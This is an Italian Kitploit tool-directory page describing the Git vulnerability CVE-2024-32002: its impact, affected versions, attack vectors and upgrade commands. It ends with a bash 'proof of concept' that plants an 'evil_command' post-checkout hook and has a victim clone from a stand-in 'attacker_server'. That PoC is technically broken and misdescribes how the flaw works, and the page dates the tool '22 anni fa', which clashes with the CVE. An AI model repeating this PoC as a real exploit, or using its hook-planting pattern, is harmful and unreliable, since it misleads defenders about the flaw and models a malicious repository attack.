Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-32002-PoC_Chinese — none | Kitploit
Strumenti/GitHubGitHub/basyacatx/cve-2024-32002-poc_chinese
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e Formazione
GitHubbasyacatx/cve-2024-32002-poc_chinese

CVE-2024-32002-PoC_Chinese

none

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Panoramica della vulnerabilità CVE-2024-32002 (⚠️ Attenzione!: Non clonare questo repository!!! ⚠️)

Descrizione

CVE-2024-32002 è una grave vulnerabilità di sicurezza scoperta nel software Git. Questa vulnerabilità consente a un attaccante remoto di eseguire codice arbitrario sui sistemi interessati tramite repository Git appositamente predisposti. La vulnerabilità risiede nel modo in cui Git gestisce determinate operazioni sui repository, a causa di una mancanza di adeguata validazione dei dati in input, portando a un rischio di esecuzione di codice remoto (RCE).

Impatto

Uno sfruttamento riuscito di questa vulnerabilità può portare a:

  • Esecuzione di codice remoto (RCE): l'attaccante è in grado di eseguire codice arbitrario sul sistema interessato.
  • Controllo del sistema: l'attaccante può ottenere il controllo completo del sistema interessato.
  • Furto e manomissione dei dati: accesso e modifica non autorizzati di dati sensibili.
  • Attacchi successivi: avviare ulteriori attacchi all'interno della rete della vittima.

Versioni interessate

Le seguenti versioni del software Git sono interessate da CVE-2024-32002: Versions Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4

Dettagli della vulnerabilità

Dettagli CVE-2024-32002 La vulnerabilità risiede nel modo in cui Git gestisce determinate operazioni sui repository. Quando un utente clona o interagisce con un repository Git malevolo, l'attaccante può iniettare codice malevolo attraverso repository o cronologie di commit appositamente predisposti. A causa della mancanza di una validazione adeguata dell'input, questo codice malevolo può eludere i controlli di sicurezza durante l'esecuzione delle operazioni sul repository, portando all'esecuzione di codice arbitrario.

Vettori di attacco

  1. Repository malevolo: l'attaccante crea un repository Git malevolo contenente una cronologia di commit o file appositamente predisposti.
  2. Ingegneria sociale: l'attaccante induce la vittima a clonare o interagire con il repository malevolo.
  3. Esecuzione del codice: quando la vittima esegue determinate operazioni Git (come git clone, git pull), il codice malevolo viene attivato ed eseguito.

Mitigazione

Aggiornamento

Si consiglia vivamente agli utenti di aggiornare all'ultima versione del software Git che include la correzione per questa vulnerabilità. Le versioni corrette sono:

  • Git 2.45.1 e successive

I comandi di aggiornamento sono i seguenti:

root@kitploit:~
# Per macOS
brew upgrade git

# Per Ubuntu/Debian
sudo apt-get update
sudo apt-get install git

# Per CentOS/RHEL
sudo yum update git

## Sfruttamento

Una prova di concetto (PoC) per CVE-2024-32002 è stata resa pubblica. Di seguito un esempio semplificato di PoC:

```bash
# L'attaccante crea un repository malevolo
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"

# Attivazione della vulnerabilità tramite una cronologia di commit con codice malevolo
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"

# La vittima attiva la vulnerabilità clonando il repository malevolo
git clone attacker_server/malicious-repo
Scarica lo strumento